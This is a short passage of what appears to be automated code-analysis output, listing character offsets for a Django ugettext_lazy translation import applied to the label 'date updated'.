django.utils.translation import ugettext_lazy as _\n'), ((632, 649), 'django.utils.translation.ugettext_lazy', '_', (['"""date updated"""'], {}), "('date updated')\n", (633, 649), True, 'from django.utils.translation import ugettext_lazy as _\n')]